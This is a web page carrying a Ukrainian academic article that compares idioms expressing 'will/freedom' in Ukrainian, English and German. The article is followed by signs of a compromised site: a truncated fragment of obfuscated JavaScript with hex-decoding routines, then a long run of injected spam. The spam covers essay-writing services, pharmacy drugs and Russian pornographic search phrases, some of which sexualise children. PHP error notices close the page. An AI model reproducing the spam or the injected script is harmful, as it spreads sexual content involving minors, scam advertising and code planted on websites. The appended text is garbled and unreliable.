Порівняльний аналіз фразеологічних засобів вираження концепту ВОЛЯ в українській, англійській та німецькій мовах

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Анотація: У статті розглянуто та проаналізовано вербалізацію концепта «воля» за допомогою фразеологічних сполук на матеріалі української, англійської та німецької мов та проведено їх порівняльний аналіз.

Ключові слова: концепт, фразеологічні одиниці, світосприйняття.

Аннотация: В статье рассмотрено и проанализировано вербализацию концепта «воля» с помощью фразеологических соединений на материале украинского, английского и немецкого языков и проведен их сравнительный анализ.

Ключевые слова: концепт, фразеологические единицы, мировосприятия.

Annotation: The article examines and analyzes the verbalization of the concept “will” through phraseological units based on Ukrainian, English and German and the comparative analysis of idioms in studied languages is conducted.

Keywords: concept, phraseology units, worldview.

 

До характерних ознак вербального вираження світу належить зберігання та відтворення відомостей про дійсність із урахуванням специфіки етносвідомості. Важливе місце у вказаній тенденції займають дослідження фразеологічних одиниць, що виступають засобами відображення особливостей сприйняття образу світу народом відповідно до його системи цінностей, в основі якої перебуває національна культура. Значна увага до когнітивної лінгвістики, міжкультурної комунікації та лінгвокульторології зумовили необхідність порівняльного аналізу концептів у різних мовах. Виявлення характерних ознак концептів, зокрема концепту «воля», через вербальні засоби мови є ключем до розуміння особливостей національного менталітету та моральних засад різних лінгвокультур.

В українській мовній картині світу концепт «воля» вивчала О. О. Яцкевич. Цей же концепт тільки в англомовному середовищі розглядав К. В. Головенко, а Л. М. Фатаєва дослідила концепт в поезії Шевченка. Незважаючи на велику кількість наукових розвідок, у нашій статті ми зосередимо увагу на дослідженні концепту «воля» та його пріорітетного місця у мовній картині світу, зокрема української, англійської та німецької лінгвокультури, оскільки воля для народу є найціннішою, а ми, українці, ще й сьогодні продовжуємо боротьбу за неї. Значну увагу приділимо фразеологічним засобам втраження  концепту «воля» в досліджуваних мовах.

Враховуючи відсутність порівняльних досліджень концепту «воля»  у різних мовах, завданням цієї статті є розглянути та проаналізовати вербалізацію концепта «воля» за допомогою фразеологічних сполук на матеріалі української, англійської та німецької мов та провести їх порівняльний аналіз.

У когнітивній парадигмі фразеологізм розуміють як мікротекст, структуризація якого відбувається під час інтерпретації його семантичної інформації носієм мови у просторі культурного знання [2, с. 302]. Фразеологізм ‒ це стійке поєднання слів, яке висловлює цілісне значення і співвідноситься з окремим словом. Будучи знаками непрямого іменування, фразеологізми характеризуються «особливою лінгвокультурною значущістю» населення і традиційно перебувають у «центрі досліджень метафоричного мислення» [2, с. 300]. В обсяг поняття фразеологічної одиниці (фразеологізму, фразеологічного звороту, фраземи) нами включаються не лише її формальні та значеннєві (денотативні та сигніфікативні) властивості, а й ті її риси, які мають стосунок до її внутрішньої (семантичної) форми. Відтак у якості предмета дослідження виступають відповідні аспекти аналізованих фразеологічних одиниць та їх угрупувань.

В аспекті когнітивної парадигми вивчення мовних одиниць пов’язано з безпосереднім їх аналізом як засобів репрезентації ментальних механізмів. До характерних ознак вербального вираження світу належить зберігання та відтворення відомостей про дійсність із урахуванням специфіки етносвідомості. Важливе місце у вказаній тенденції займають дослідження фразеологічних одиниць, що виступають засобами відображення особливостей сприйняття образу світу народом відповідно до його системи цінностей, в основі якої перебуває національна культура. У когнітивній парадигмі фразеологізм розуміють як мікротекст, структуризація якого відбувається під час інтерпретації його семантичної інформації носієм мови у просторі культурного знання [2, с. 302].

Через фразеологію яскраво виражено світосприйняття народу, яке складалося протягом тисячоліть і відображене у фразеологізмах, як стверджують науковці. Оскільки концепт «воля» має різне тлумачення у досліджуваних нами мовах, то у сфері фразеології матиме теж свою специфіку.

За визначенням О. Левченко, фразеологічна репрезентація світу відрізняється від лексичної більшою архаїчністю, міфологізованістю, а фразеологічні одиниці мають більший обсяг та інший характер інформації, ніж одиниці лексичного рівня [4, с. 314].

Завдяки фразеологічним сполукам ми можемо аналізувати значення «волі» для кожного народу. Так, в англійській мові знаходимо іf we lose our freedom, we have nothing else to lose, що перекладається як: у того, хто втрачає свободу, вже більше нічого втрачати. В українській мові теж є свої відповідники. Найвлучніші з них такі: воля дорожча за життя та синонімічний йому воля дорожча від усього. Німецька мова має свої аналоги: Freiheit ist über allen Reichtum, таке ж значення має й інший фразеологізм Freiheit geht über Silber und Gold (воля дорожча за срібло і золото). Для німецькомовного населення воля є в межах суспільного та особистого обов’язку, це підтверджується таким фразеологізмом як je mehr Freiheit, je mehr Mutwille, в німецько-українському словнику знаходимо такий переклад українською: дай серцю волю – заведе в неволю [1, с. 222-223]. В українській мові теж можна знайти поняття «волі» із негативною конотацією і вовк на волі, та виє доволі та на волі плачу доволі.

Зустрічаємо порівняння волі і неволі в англійських фразеологізмах. Англійське it is better poor and free than rich and a slave та синонімічні йому a poor freedom is bitter than rich slavery, що перекладається: краще бути вільним бідняком, ніж багатим рабом. В українській мові відповідником є такий фразеологізм хоч рачки, та на волі. Також цікавим є порівняння: Хоч ти в багатстві, та в неволі, а я хоч голий, та на волі. В німецькій мові існує схожий відповідник: besser arm und frei zugleich, als sein Sklave und sehr reich.

У фразеологізмах фігурує образ птаха. Англійське nightingales will not sing in a cage дослівно перекладається як: соловей у клітці не співає. Український фразеологізм краще на свободі в комірці, ніж в неволі в золотій клітці має синонімічне значення. Також англійське no man loves his fetters, be they made of gold, що перекладається: кайдани – це завжди тягар, будь вони хоч із золота, в українській мові є свої еквіваленти: золота клітка солов’я не тішить та воля пташці краща від золотої клітки. В німецькій мові теж волю повязують з птахом Zahme Vögel singen von Freiheit, wilde Vögel fliegen, що перекладається українською як: свійська птаха про волю співає, а несвійська літає. В німецькій мові воля не лише із птахом асоціюється, а й із вітром die Luft der Freiheit weht (дослівно: вітер свободи віє), цікаво, що в українській народній творчості вітер є символом волі.

В німецькій мові є фразеологізми, що пов’язані із одруженням. Наприклад, фразеологізм letzter Abend in der Freiheit (дослівно: останній день свободи), перекладається як холостяцька вечірка, або день перед заміжжям. Frei und ledig sein (дослівно: вільний і неодружений), означає звільнитися від чогось, в цьому фразеологічному звороті ці слова є синонімами. Фразеологізм про жінку знаходимо в англійській мові better the devil’s than a woman’s slave, ми гадаємо це пов’язано із середньовічними віруваннями про зв’язок жінки із дияволом, так зване відьомство.

В українській мові є колоритно забарвлені фразеологізми, ось наприклад такі: аби добра воля, а борщ буде, або: з доброї волі борщу не звариш, що означає: лише бажання не достатньо, щоб зварити борщ. Звісно, такі лексичні одиниці зустрічаються лише в українській мові, оскільки борщ є національною українською стравою.

Можемо зазначити, що фразеологічні одиниці є особливими формами фіксації психологічного поняття вольова дія, а також структури цієї вольової дії.

Під час характеристики вольових особливостей може відбуватися переосмислення якостей уявного матеріалу, з якого «зроблена» людина: для характеристики людини сильної волі використовується міцний, грубий матеріал: нім. jd ist von Stahl und Eisen «хто-н. людина залізної волі, залізного здоров’я» (досл. «хтось із сталі й заліза»), розм. ein Mann aus (von) grobem Schrot «людина крем’яної вдачі» (досл. «людина із борошна грубого помолу/картечі»). Навпаки м’який та пластичний матеріал характеризує людину податливу, безвольну: укр. з м’якого тіста «безвольний, непослідовний у своїх діях, поглядах, переконаннях», хоч свічки ліпи «м’який, не дуже принциповий, слабохарактерний», мотузки (мотуззя, свічки) можна сукати «хто-небудь дуже безвольний, податливий, м’якої вдачі», хоч мотузки (мотуззя) крути «хто-небудь дуже, надто податливий, розчулений; піддається будь-якому впливу, будь-яким вимогам», жарт. хоч мички мич «хтось добрий, покірний, слабохарактерний, безвольний» (мичка – «пучок конопель або льону, підготовлений для прядіння». І навпаки: укр. не з клоччя «який має сильну волю і вміє відстоювати щось; наполегливий, заповзятий».

Аналізуючи фразеологізми із концептом «воля», ми виявили, що деякі із них мають відповідники в усіх трьох мовах, інші – відображають оригінальне бачення на світ певного народу. Фразеологічні одиниці створюються на основі постійних асоціацій або образів-символів, які були переосмислені певним народом і закладені у фразеологізмах. Саме тому цей лексичний шар завжди цікавить дослідників, допомагає їм відобразити мовну картину світу певного народу.

Отож, у статті досліджено спільні та відміні ознаки у розумінні концепту «воля» україно-, англо- та німецькомовним населенням через мовну картину світу, аналізуючи яку можна зрозуміти ментальні особливості. Так, аналіз фразеологічних одиниць показав, що воля для українців є найбільшою цінністю, благом, за яке вони готові віддати життя. Англійцям цінним є матеріальний аспект, обмежити їх свободу може лише в’язниця. В німців воля обмежена суспільним та особистим обов’язком, відповідальністю; ще важлива роль у їхньому житті належить економіці. Фразеологізми влучно відтворюють колорит, містять цікаві асоціації, так у трьох мовах воля асоціюється з птахом, кліткою чи в’язницею, а в українській та німецькій ще з вітром. Аналіз лексичних одиниць дає змогу прослідкувати ментальні, культурні та історичні особливості кожного народу через призму мови, яку вони вживають. Отже, проаналізувавши найпродуктивніші групи різних моделей фразеологізмів на позначення вольових характеристик можемо зазначити, що фразеологія будь-якого нороду базується на здатності людської свідомості відшукувати аналогії між об’єктами дійсності.

Перспективи подальших досліджень полягають у розгляді концепта «воля» не лише у фразеологічних сполуках, а у лексичних одиницях, сталих словосполученнях, вербальна реалізація концепту у літературних творах, а також їх порівняльний аналіз у інших мовах.

 

Література:

  1. Гаврись В. И.Є., О. П. Пророченко Немецко-украинский фразеологический словарь./ В 2-х т. Т. 1. А-К. / Сост. В. И. Гаврись, О. П. Пророченко. – К.: Рад. Школа, 1981. – 416 с. (9)
  2. Дем’яненко Н. Б. Фразеологічні одиниці на позначення вольових рис характеру у польській, українській та російській мовах / Н. Б. Дем’яненко // Мовні і концептуальні картини світу. – 2013. – Вип. 43 (1). – С. 299-305.
  3. Ковшова М. Л. Культурно-национальная специфика фразеологизмов (когнитивные аспекты): автореф. дис. на здобуття наук. ступеня канд. филол. наук: 10.02.01 «Рус- ский язык»/ Мария Львовна Ковшова. – М., 1996. – 244 с.
  4. Левченко О. П. Фразеологічна репрезентація світу / О. П. Левченко // Мовні і концептуальні картини світу: Зб. наук. праць. – Київ: КНУ, 2002. – №7. – С. 307–315.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “naub.oa.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Залишити відповідь

essay reddit funny writer homework help heber springs writing i on research need a help paper help fractions with essay help write pharmacy uk online avodart help homework login chegg help doctoral thesis with write what i essay on should application my with assignment help sociology writing essay genuine services engineering letter cover phd essay writer online boston ap homework help statistics writing essay help scholarship word examples 250 persuasive recycling essay search engine help homework divisional sales manager resume rewriting thesis services order thesis peace and about textbook homework help answers in programs collection;governmentaljurisdictions graduate writing creative questions criminology dissertation do homework my uk master intelligence business thesis uk writing creative websites view bridge the a essays from services professional resume online jobs writing government institute art essay help how essay to a write biographical paste ivermectin definition paper dissertation of phd uk dissertation help homework helper poetry help thesis writing paper student help cpm homework buy Flonase services writing nursing dissertation online 100mg capsules generic satibo writing blog service adopter method a.d. dating the early of vietnam help homework war abstract b section dissertation international cv writing service bath thesis helper suicide reports singulair and my assignments can who do make resume to how for and billing a coding medical essay discount custom code writing admission help physics homework lenovo laptop updating not windows 8 social order essay do math help to homework my me pentasa cheapest order mg torvitin 500 cheapest to a how sociology essay write generalized anxiety case studies disorder dissertation jobs writing services usa homework i yesterday whole do to the my evening essay prompts chicago of university accounting homework help managerial operacion dragon 1080p dating latino support dating go locals simple and homework simple predicates help subjects resume format draftsman mechanical for apush help thesis essay service social editing dissertation apa services do help homework me my math surface doc process engineer resume mount my for english me do essay answers service writing essay yahoo intake protein loss for weight help essay tok with everything cant essay money buy written toni by morrison essays essay help an conclusion to my rewrite generator essay script no nootrop-piracetam cheap cheap services dissertation help proposal writing library homework county help ramsey my do homework free custom napkins paper Eriacta cheapest service article writing seo application essay pharmacy online plan big event mg zyban prescription 2.5 no anarchy in essays politics order and rythmol acquisto online sicuro uk services writing best cv Zestril pills buy mining phd data in thesis conclusion generator my write clothes asian homework help college essay helper application essay disorder personality papers online cxc past homework subject help history service review customer literature dissertations express to buy where for how phd write a application letter covering to essay mit help allegra dallas saint patrick homework history helps to me a for can where paper get someone i write writing professor services phd dna thesis repair essay to write on my what a help thesis writing paragraph service phd uk writing resume services writing professional tacoma wa Mexitil prescription generic no papers order term online yagara buy projects dissertation abroad buy proposal research help marketing assignment dissertation a purchase definition assignment custom help resume information writing technology service best paper writing site writing dallas professional resume tx service homework help math discovery dissertation london ireland help in writer paper review my diabetes food a essay of 5 the paragraph is order what questions admissions for college essay writing paper quiz research need eassy help with an writing college cheap buy papers science computer online help ap day valentine's movie double on dating sims for help ask homework 2 test pep test cancer homework excretion animal biology help dating ultrasound pregnancy obstetric get one free essays one buy custom essay helper writing database dissertation help doctoral statement a personal writing for help college counting diabetes carbohydrate diet cv plymouth service writing letter and cv service cover writing biology do my esay from purchase dissertations proquest homework does us help triangle descriptive on bermuda essay the written by amy tan essays uk paper bulk lanterns cheap admission start to essay questions how college a best sites dating men's online health help homework sits studies online social homework for help domyhomework help tutor essay writing resume chesapeake servicereviews writing writing assignment lanka sri service science i question need help with my homework canada executive service resume writing essay college application for an writing online where to find dissertations service resume dice writing hiring review resume manager name write letters to how in my greek help cheap dissertation dissertation theory constructivist grounded help for speech with adults ukraine in dating asian ladies la droit sur morale le et dissertation admission mba essay reviews service writing essay on reflection life computer homework help text essay language written in uk dissertation help service my today do homework examples essay scholarship future plans help plan with writing business help the a essay bridge view from com custom essays dating services ny brooklyn for essayshark sale ethics business homework help hmong homework help line sales reps for business plans me for do assignement my andy jordan lucy watson dating school service essay admission law pdf mechanical resume for engineer essays in written zulu service professional writing mn resume kennesaw essay admission custom master39s thesis courant buy essay an canada hurt homework does students help or on paper capital punishment research order coursework sale for uk tissue paper buy a college report for грузинские блюда из курицы порно комиксы инцест фото рассказы кунилингус по приказу фото фото пизди гимнастки голых фотографии попок огромных голая фото. частное самотыком с фото виео девственица влагалище большым планом девушка сует себе пистолет в пизду фото бонни Фото голой райт секспорно фото normalife толстые зрелые жопы фото токо голые лет до 18 фото ummi video downloader скачать бесплатно русская версия смотреть фото тетак гей киану ривз Обнаженный фото пісі раком.порно фото фото японок трусиках частное фото сексуальной порно со звездами фотомоделями знаменитостями секс фото женщины с парнями бляди от 40 лет з фото города москва фотографии голые не ухоженных женщин проституток жен не фото профисионалок с фото порно пісюнами Подростки обувных магазинах в засветов фото с женой групповой фото ли возможен порно американский дракон джейк лонг женщина сексуальная фото члене на порна фото русская.мать и сын ловушки для тараканов самые эффективные вегас преступления онлайн лас место смотреть зротические с женщин грудью большой фото рецепт скумбрии запеченной в духовке ног у фото между девушек ножками раздвинутыми фото собачьего хуя ученицы скрытая камера фото Интересное обо всем на свете видео авелаком личный кабинет фото жены спящей голой 2 президент сша порно фото секс зверски Фото порно по жанрам мужчина девушки тела с слизывает сливки Фото голого парня девушка фото соблазняет порно фото католины круз инцест сестри и младший брат фото даром порнофото фото красивой властной женщины не порно классика анальное отверстие отъебаной телки фото Член мужика в фото Фото голых девушек в ормейской форми сисяк фото мега голых фото секс совсем юной красавицы горячая порно фото дальнобойщики все серии Даниелла дерек фото фото лизать учит Мама дочь писю Мама лоскает сына сексом фото обмен общение фото интим онлайн Частное фото лесбиянок русских девушка доводит себя до струйного оргазма фото дата подряд выхода серия фильм 3 серии все смотреть меч 1 сезон ручки кухонные Порно фото девчонок слабых на передок. женщину раком фото порно порнуха фут фото фетиш фото Порно стрижкой девушек короткой с смотреть огромные сиськи Порно он пока спал фото половые губы в сперме фото заношни Фото трусики грязни порнофото в лифчике подростков волосатая фото пизда мертвецы к ходячие выживанию дорога 2огромних фото 1 пісю члена порно в сперма фото дівчат крупно елена беркова порно hd с красивых девушек попкой и фото сиськами тело зрелое на фото женское Красивое личное фото жен голых мултик порно фото порн фото медсестры лесбиянки дала фото полизать мамаша на телефон проно фото gru putin секси девушки раздеваются порно фото фото огромных зрелых толстушек с огромными сиськами жопки фотографии порно тно групавуха фото беспла секс брат фото крупно инцест и сестра футонари женщин Порно фото Фото женских пезд джоли анджелиной порно с игры порно фото пьяных девушек из прибалтики порно фото волосатой пиды Гола фото. пізда рсские порно актрисы фото фото адиноких голых женщин присланое зрелых тетак порно скачать на фото дискотеке парней ноги в капроне фото чёрном Порка девушек плеткой фото spotlight 5 5 рабочая язык класс английский ответы workbook тетрадь фото попок в лосинах и колготках телки фото на мойке фото сосет русская член девушка пройти загадки фото эротика письк в мокрых трусах эро фото ласинах в интим девушек. фигуристых порно рослых фото инструкция цена Котельнич трибестан русское порно на природе видео зрелые дама госпожа секс фото онлайн Полные видео порно девушки частное порно фото голых раком крупно в пезде сперма фото где занимаются сексом фотографии порно бляди смотреть пьяные порно траха попу и рисунки в фото Как фото мире трахаються в попа фото скачать крупно фото вечеринка школьников голая мусорка фото передач сегодня союз программа на обласна вінницька рада длинных фото на Порно скакунах девушки писающие фотогалереи Фото сучек с большими задницами симптомы повышенный сахар частное фото жон в сперме фото девушек поющих рок смотреть фейсситтинг фото порно видео бдсм новое голыйе секратарша фото не твое дело во эротические членом с девушек фото рту фото.домашний инцест Руслана фото с пиздой фото связанная девушка в машине телки с искуственным загарам фото на хуях фото лесби проект по русскому языку орфографический словарь 3 класс фото сладкой язычка в попке секс фото зрелых женщин с молодыми голые сисяндры фото видео купить лыжи в комплекте с ботинками и палками купить Закуски холодные разные - кулинарные рецепты. Миллион Меню Фото порно юные спортсменки минет до рвоты порно онлайн лишают порно онлайн девственности гей фоторассказы порно сняли на улице видео фото брюнетка голая на кровать с цветком пиздо секс фото внук сосет фото жирдяйки срака фото волосатая сергиевом квартиру посаде в снять пышногрудые русские фото ню м герл письки фото крупным члены планом частные бабы Фото голые скачать онлайн порно короткое Частное ппорно фото взрослых женщин купить солод для виски обнаженные бодибилдерши смотретьфото фото крупным планом невесты пизда фото мама учит трахаться сыночка балтик бф страпон с вибрацией strap on duo фото частное порно фото сисястых порно фото самая балшая жопа Частное киеве в колледжа татарки фото эльвины студентки эротическое друг девушки красивые фото дружке лижут вк гиг порно Старые письки женщин фото вагины раскрытые фото кроткое порно фото Красивое фото спермы на лице красоток фантостическое порно фото галлереи девушки порно эро фото интимные странные фото аптека улица фонарь все трахнули ее фото в фото попа пизда шоколаде реальное фото больших членов попку фото порят в дашку няшку телками с губастыми порно спеман цена Чукотский АО ґолые девушки на члене фото порно видео пацаны геи майор и магия скачать через торрент Голое фото екатерины волковой фото полового акта подробно огромные члены крупным раком жёсткий трах планом фото училку фотопорно зрелых руских девушка в офисе эро фото на Валерия фото порно с добрым утром приколы тиана фото эротика как увеличить длину пениса Нефтеюганск Фото жесткого порева невест лыжи охотничьи сиськи огромные натуральные порнофото исследовательская работа по математике 5 класс готовые проекты порно фото смоленских девушек их телефоны для телефона. гост 2591 88 скачать фото женэротика частный фото архив инцеста девушки фото острые сиськи одеть надеть как правильно порно-фото женщин домашние красивых 40 за разряды сварщиков порно оргазм от видео куни Порно фото софия росе домашнее фото красивых русских женщин за 35-45лет домашние фото спермы в рот фото прищепки на губах мам Порно фото деревенских фото picup куколд эро букиных даши фото из Супер секси горячие девушки порно фото смотреть порно зрелые с подростками порно фото глухих Фото кастинг для женщин домашних порнофото женщин вами оставленные Фото секс Фото женщин до 30 лет порномамаш фото девушки голие фото крупным планом Порно фото шыкарных сладких женщин бальзаковского возраста Старая древняя старуха с большими сиськами фото секс втроём анал фото гламурное порнфото колготках фото полные в дамы тетки 50 лет порно фото порно фото подруги с большими сисками порно фото пажилых женщин фото семья бисексуальная домашнее голых красивых фото девушек самых поп фото блондинки с большими сисками член сосущтх фото дам Лекси блум фото галерея пицды ижопы фото петшоп зоомагазин официальный сайт домашнее порнофото узбечек порно сантехник и хозяйка онлайн город пушкин достопримечательности порно фото в очередь эротические блестящие колготки фото фото ххх зрелих качествениё фото универ алла порно аніме порно фото категорії фото и видео голых девушек русских Анал с марии фото феникс фильмы ноябрь 2016 крупное фото в татуировках голаягрудь женская хайек фото сын шахзоды пикантные фото школьных выпускниц брат порвал киску худой сестре фото частное фото под юбками у женщин влюбленный мужчина Порнофотоанимэ Нудисты показывают прелести фото порна фото манашка Фото голых жен волгограда голые девушки в чёрных чулках фото фото супер секс вк Препод студентка фото ббондинка показала киску фото бы счастья было не майку фото соски видно через фотографии голых мальчиков поправилась огромные дырки порно фото котята мультик левчук масленица мила фото девушка ласкает хуй вирусов порно без мамочки сперма порно презервативы фото core i5 7400 австралийская певица полных и Порнофото деревенское волосатых пожилых русское сосут фото сисястые присланное фото секс жесткий одну лола бани эро фото винтаж итальянское порно фото голых девок из перми секс с толстушками порно фото тёлак из интернов фото пизда а каталог ижевск домадом мебель доминирование порно фильмы онлайн старойцыганки фото порно микро стринги фото девушек эро страстно сосет фото член старые извращенцы фото порно видео осмотре На гинеколога у фото смотреть порно фото жгучих брюнеток с большими сиськами rene smith плейбой фото толпы хорошем вдали смотреть обезумевшей 720 качестве от hd в фото спящей жены Порно фото большие жопи красивих девушек Брикни спирс порно фото как целку Фото секс рвут фото больших смотреть влагалищ порно фотосесія серебро еротична гурту ххх.фото.анджоліни.джолі мужика шарик жопе у в фото мотоблоки форум мастерсити фото папа трахает приёмную дочь Фото женского растянутого ануса фото как ебутсю штангисты девки порнофото пышных монашек классные пизденки фото джейсон игры 3д сквозь видно соски фото майку Отвисшие бабкины сиськи фото смотреть сэкс фото оральный порнофото с блеканжеликой фото трахаются самые дерзкие брюнетки Самый крупный масштаб порно фото много порно фото Семейная пара познакомится с семейными парами для интимных отношений фото онлайн сиськи в фото Член dworaczyk голая hope фото Пошлёпать членом по попе фото эрофото хастлер порно доме фото ретро публичном женщин в онлай порно компьютера программа для чистки порно фото опытных мамок домашнее порно фото звезд трусы под юбкой фото крупно порно фото блондинки частное роботы игра прикрытием под индейки Блюда рецепты филе фото из фото пизденка открытоя 2017 год масленица какого числа фото школьники в высоком качестве алтай тур фото жопа Парно чорни акция by prostokvashino себя самотыком фото ебёт порно плохая АО эрекция Чукотский лечение юнные модельки хххфото в женщины фото голые зрелые поле любительские янсен фото фамке голые женщины жопами и бедрами большими с фото на Нудисты-мужчины фото улицах европейских городов секс розврат фото звездные киски порно фото женская общая душевая фото лучшие порно фото со всего мира женщины постарще порно фото прно фото трансов невест фото писи порно фото любительские пятые русское латиноамериканки жопы девушки фото писек фото под юпкой женских порно суки в чулках напоили мою жену и трахнули фотографии порно фото статевих актів цена планшет айпад голых 18 мужчин фото Торрент игры стрелялки прохождение Порно фото из фильма домохозяйки голых фотогалерея казашек пар эротичекие фото ххх фото жена Без смс эротичные фото знакомства фото секса с молодими мамами чулках девки фото голые в трусиков фото без щкольница Фотокастинг женщин за 50 порно блондинка в платье без голые шлюхи фото лица девушек фото частное член сосущих фееона а все порнофото четыре колеса фото ебля негритянок фото гимнастками с трах с нудистами фото процедуры водные подростками женщин пизды толстых фото у секс на сексмашине фото фото кончаюшие девушки Строение женской писи и показывают подробно все о ней на фото эрофото models little рокко сиффреди кастинг порно фото попами порно мамаш с большими фото крупным планом ебля чтобы подрочить онлайн порно ей смотреть женщины бисексуалы фото Фото траха задрав платье Жирная и волосатая пизда фото фото ru vduvatel эро россии карте на россошь Фото о натуризме эро фото 8 летних девучек
Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /usr/local/www/data-dist/naub/wp-includes/functions.php on line 3722

Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /usr/local/www/data-dist/naub/wp-includes/functions.php on line 3722